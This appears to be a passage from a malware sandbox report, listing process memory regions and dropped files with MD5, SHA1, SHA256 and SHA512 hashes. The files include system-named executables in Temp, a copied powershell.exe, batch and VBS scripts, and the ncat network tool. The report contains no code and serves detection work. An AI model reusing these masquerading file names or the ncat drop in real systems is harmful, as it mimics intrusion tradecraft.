memory/4844-19-0x00007FFB51CC0000-0x00007FFB52781000-memory.dmp
memory/4844-20-0x00007FFB51CC0000-0x00007FFB52781000-memory.dmp
memory/4844-30-0x00007FFB51CC0000-0x00007FFB52781000-memory.dmp
memory/4844-31-0x00000223FF750000-0x00000223FF794000-memory.dmp
memory/4844-32-0x00000223FF840000-0x00000223FF8B6000-memory.dmp
memory/4844-33-0x000002239B840000-0x000002239B848000-memory.dmp
memory/4844-34-0x00000223CBCE0000-0x00000223CC7B4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a2b24af1492f112d2e53cb7415fda39f |
| SHA1 | dbfcee57242a14b60997bd03379cc60198976d85 |
| SHA256 | fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073 |
| SHA512 | 9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0 |
C:\Users\Admin\AppData\Roaming\Windows_Log_545.vbs
| MD5 | 002f8257c528582dd81f1964853c41d3 |
| SHA1 | 21dc3dbd443883915ba58f605601cc69a48ee6d7 |
| SHA256 | 3c4c238990826d5dde7d26ece839ee9c9afdfbe450f76378fa17fd996f9623bf |
| SHA512 | 02e6cc9dd6025672895e664ed7c996df90417aca1b6c7a4e11aa7259af1a07938280e23f7097a670f691ef0b9ebfad05d12279ea2e30ef9b8358eb2ccee36d4e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 005bc2ef5a9d890fb2297be6a36f01c2 |
| SHA1 | 0c52adee1316c54b0bfdc510c0963196e7ebb430 |
| SHA256 | 342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d |
| SHA512 | f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22 |
memory/4844-63-0x00007FFB51CC0000-0x00007FFB52781000-memory.dmp
memory/1084-72-0x0000013944350000-0x000001394436A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\wininit.exe
| MD5 | ba300d38cfdf1c73eddcd7a1ac589b78 |
| SHA1 | c8741781f775f51dbf559ae783adcd762b036946 |
| SHA256 | e35f07e7fab453e5366f8f220d8302f31dc134aebc71fedc6beb113c9706961f |
| SHA512 | 19274f0742d4e82c3f184ec264bb8f9d4fd3c7092b51ec63b727c3ab33ef70cd36805f1f7c52c663ff72496c79b827c23bfc547031f60e62dba396bdaaa50047 |
C:\Users\Admin\AppData\Local\Temp\7zip.exe
| MD5 | aa4404671315c6f141a264b628d05052 |
| SHA1 | 5e1b52fd1b3ce93f82c35b8e07c08774003dd422 |
| SHA256 | d09701eb2589607f7827408b297ce94f8f3f9afcbc77a8f098cac2df6ccb8d18 |
| SHA512 | 5a8e8398e126d760f5486de6fae139f3e597f26da2eccc89234c32131c352259a4b8cd19596ab58dd45ca66356f89290cbdb74d7e8b7daee1af73204fda08eca |
C:\Users\Admin\AppData\Local\Temp\conhost.exe
| MD5 | c8be6e344fd58475e1cfe3bf12e69380 |
| SHA1 | da41de66884faeccc83283accc0d23a722915774 |
| SHA256 | ccd4b5bf3a42a5006ced7f25a17765b778c17c6bb28a488dd466d493709cdec0 |
| SHA512 | 46639ab300a492f1d7783a27a349674a22b112b26a77e5ee7c3f910b88f2fa4f8e581b72e3e4632b4bdf7a04d63d1e3153a8989b2974bc4bdca985576c71cea8 |
C:\Users\Admin\AppData\Local\Temp\WinRunner.exe
| MD5 | 4758850f5686ee8da4e930c97d6caca2 |
| SHA1 | 190f3d1b98411cc586546780a59d7c5730ab3d64 |
| SHA256 | cdd06b27fd62b93abf2eadf7ad388fca617951a834c612862a5ee3c0c2cd72a3 |
| SHA512 | c764ebd03544b5073577e2d5f84d8134d119b78a41179f24092cd9051f6396fcff639131c3e27617e0f40030f1af0d9e02a3f7d62e2987edbc4c9e26bbd3a1af |
memory/1560-114-0x00000000003C0000-0x00000000003D6000-memory.dmp
memory/1400-109-0x0000000000F10000-0x0000000000F26000-memory.dmp
memory/4460-115-0x0000000000E90000-0x0000000000EFC000-memory.dmp
memory/4460-116-0x0000000005EA0000-0x0000000006444000-memory.dmp
memory/4460-117-0x0000000005990000-0x0000000005A22000-memory.dmp
memory/1264-118-0x000001F278460000-0x000001F278E8C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\$TMP~.bat
| MD5 | 6bf11eb7e2ca37624f85d163b2a3f866 |
| SHA1 | 00a65cddc32344d3b15b6bca4315ff692524494b |
| SHA256 | c4c7558e442c5f915fd6caf1290610ca2423dafca97ae05b1eac715f4267197b |
| SHA512 | 79c8ba8ad545244c9c3765f32f291ffe918d8af1bcf7b3d375fdfee70e39ae4a548e25425ac3f2252276777a784a2ba5fd64f833b7776a413d4cabc3932272e0 |
C:\Users\Admin\AppData\Local\Temp\ncat.exe
| MD5 | 4f6b1c5a41f7e9d183a7dd3ace65812e |
| SHA1 | c08a5e5c59f39522939284ee8743ff55967da76a |
| SHA256 | a3071223a56a18c9fb913696487f69d1ea2633176412446d4b7eecc82d33c262 |
| SHA512 | 25c7a3f16b001144cc8fdc5c9014cdfe33352bd76c116c3e1b7e3238668ae0b284fc641b96aee92d07dc9a25fa9b016e441db96c07f2426e09b0ec9b8d2443cf |
C:\Users\Admin\AppData\Local\Temp\libssl-3.dll
| MD5 | 24f02f8bd55813c87a4952e60e87edf1 |
| SHA1 | c19834e2d64dd44d84d58c73d88b454fd6ccb385 |
| SHA256 | 70b3b431d10ca9dea42b5b5aca85a97c39c91e0e2e3b5763514c1608a5f980b3 |
| SHA512 | 04922a3a80d551cfada9fcb765966eeca0741bfff3469a551d538580b64a70d8f1a6a94abada3762a79cd6fd2222eb38c9e491a74fc19937bbd8ab309770f7ad |
C:\Users\Admin\AppData\Local\Temp\libcrypto-3.dll
| MD5 | 27c8a62563e3f34f3466d3cbf4b8fe74 |
| SHA1 | 23a2585b4afa8e77d365fb1bcf8c96d7273b9742 |
| SHA256 | 3927d87e03ad83e22a40fdcb680707a28eb04314af51f228130d8396dabb3de4 |
| SHA512 | c24f2725a05b209895e4de7b548fc7782d5695bcadc6b79a742c9860efa4691f4cb0b997bb1035b379c64de9d5476e6425e1e76e0b6d73faee635e7fc87207d1 |
memory/3612-133-0x0000000002390000-0x00000000023C6000-memory.dmp
memory/3612-134-0x0000000004F60000-0x0000000005588000-memory.dmp
memory/3612-135-0x0000000004E00000-0x0000000004E22000-memory.dmp
memory/3612-136-0x0000000005600000-0x0000000005666000-memory.dmp
memory/3612-137-0x0000000005670000-0x00000000056D6000-memory.dmp
memory/3612-143-0x00000000056E0000-0x0000000005A34000-memory.dmp
memory/4460-148-0x0000000005E60000-0x0000000005E72000-memory.dmp
memory/3612-149-0x0000000005C80000-0x0000000005C9E000-memory.dmp
memory/3612-150-0x00000000061E0000-0x000000000622C000-memory.dmp
memory/4460-151-0x0000000006B50000-0x0000000006B8C000-memory.dmp
memory/3612-152-0x0000000006140000-0x0000000006184000-memory.dmp
memory/3612-153-0x0000000006F90000-0x0000000007006000-memory.dmp
memory/4460-160-0x0000000007260000-0x000000000726A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c83a376f88adb9cc72f23f956f795fbe |
| SHA1 | c9e15ce9011ccfbd75d67e3f14d07d95159fe4e3 |
| SHA256 | 4d1c7401aff6d6e60498b509a4f692238450cfe247462311d7e7ecbe76b014f6 |
| SHA512 | d575344b219e247bba99aa18aceb2d70c6fd738d7d97c4d67efd58d72d1bc1f8ff99efcbf19a43c92897957328ac6ad3e3bdede24875616d1721639b5fc72aca |
memory/3612-175-0x0000000007690000-0x0000000007D0A000-memory.dmp
memory/3612-176-0x0000000007010000-0x000000000702A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2e907f77659a6601fcc408274894da2e |
| SHA1 | 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d |
| SHA256 | 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233 |
| SHA512 | 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | dbb22d95851b93abf2afe8fb96a8e544 |
| SHA1 | 920ec5fdb323537bcf78f7e29a4fc274e657f7a4 |
| SHA256 | e1ee9af6b9e3bfd41b7d2c980580bb7427883f1169ed3df4be11293ce7895465 |
| SHA512 | 16031134458bf312509044a3028be46034c544163c4ca956aee74d2075fbeb5873754d2254dc1d0b573ce1a644336ac4c8bd7147aba100bfdac8c504900ef3fc |
memory/1560-205-0x000000001C2D0000-0x000000001C2DE000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | a26df49623eff12a70a93f649776dab7 |
| SHA1 | efb53bd0df3ac34bd119adf8788127ad57e53803 |
| SHA256 | 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245 |
| SHA512 | e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c |
memory/1084-208-0x000001394C5F0000-0x000001394C710000-memory.dmp
memory/1400-248-0x00000000031D0000-0x0000000003202000-memory.dmp
memory/1400-249-0x0000000003200000-0x000000000321E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ba169f4dcbbf147fe78ef0061a95e83b |
| SHA1 | 92a571a6eef49fff666e0f62a3545bcd1cdcda67 |
| SHA256 | 5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1 |
| SHA512 | 8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | d098e16245a7ee2be8d71e2f479d9a11 |
| SHA1 | a3996578e8fd87162f56368e1c8b2df10f9e1f6a |
| SHA256 | 6f5fdde68b3ea60bcdcccbbaef8bc042f829f95ea91b64741ee0b22c45025d3f |
| SHA512 | c46402739ebfba2096206421e12b0c3b6509091fac0c371c914e21224059224ca8c0785f000caf71b0c0b93f3fa631ec17e6689526ae842ca61a0478b1e7644e |
C:\Users\Admin\AppData\Local\Temp\hxmtgb.bat
| MD5 | e5875a36832aaa49f37c2006c13c6cf8 |
| SHA1 | 3120ae5f2f95c0a9683a50e21e25e9ac040b7dc3 |
| SHA256 | 0b002e02455f2afa8d89489f3111b2eb73388d4f00b5f1bd9f7a3f00df0e2897 |
| SHA512 | cd9b1eb2ebe17a88aeb9670b0983a1d7a0ec24134239055078e629b6e03af8535073d9e5b99e886c86a4c3736046f74d8e4f86c27f2d0f45ea9556afb3c137a0 |
memory/3644-273-0x000001B186E10000-0x000001B186E18000-memory.dmp
memory/3644-274-0x000001B1A1080000-0x000001B1A10CC000-memory.dmp
memory/3432-276-0x0000000002AD0000-0x0000000002AFA000-memory.dmp
memory/3644-275-0x000001B19EF60000-0x000001B19EF76000-memory.dmp
memory/3432-281-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
memory/392-282-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
memory/3344-283-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
memory/1368-284-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
memory/1988-287-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
memory/2348-289-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
memory/1124-288-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
memory/1348-298-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
memory/952-297-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
memory/2544-299-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
memory/2332-300-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
memory/1540-325-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
memory/1744-296-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
memory/4240-339-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
memory/2036-338-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
memory/1336-337-0x00007FFB30030000-0x00007FFB30040000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0e0266e9b8595afad38e3aeeb7ac9e79 |
| SHA1 | d7f76538c8f2b58b6815fe7f4d3038d4d920a45f |
| SHA256 | 27bc56e8dd548d29e61b6b8654730b0b30f8d96c7f37ef5c204d4100ee297d43 |
| SHA512 | f6e294475d8c96792311bfc8b452a89ca7fb8fdcb127b04e773172f7df0d4e15b30bbd60c9cd6311e442d74a140411c860439afaaa968f05922c73599a0695a4 |
memory/1956-391-0x000002CE41680000-0x000002CE4169C000-memory.dmp
memory/1956-392-0x000002CE3F380000-0x000002CE3F38A000-memory.dmp
memory/1956-393-0x000002CE417E0000-0x000002CE417E8000-memory.dmp
memory/1956-394-0x000002CE417F0000-0x000002CE417FA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 96ff1ee586a153b4e7ce8661cabc0442 |
| SHA1 | 140d4ff1840cb40601489f3826954386af612136 |
| SHA256 | 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8 |
| SHA512 | 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8a1d5945d69caaa5ad4650aa92416db8 |
| SHA1 | fce5ff33231a7b99c4e54afac0b356aa72c86aef |
| SHA256 | 536f6c89e5a645ed4b13768d4e63be2900f010b341e04729e79c04af7af1d567 |
| SHA512 | 04a94cfc967dccb836f2a51b86f861f77421f57bfc6826b00a63a86df995e0e873b38a5c930a15a173b3ea4e768776a13860206468d1bb7ec614ce93f8143cc2 |
C:\Users\Admin\AppData\Roaming\powershell.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
memory/3424-461-0x0000000005F30000-0x0000000005F7C000-memory.dmp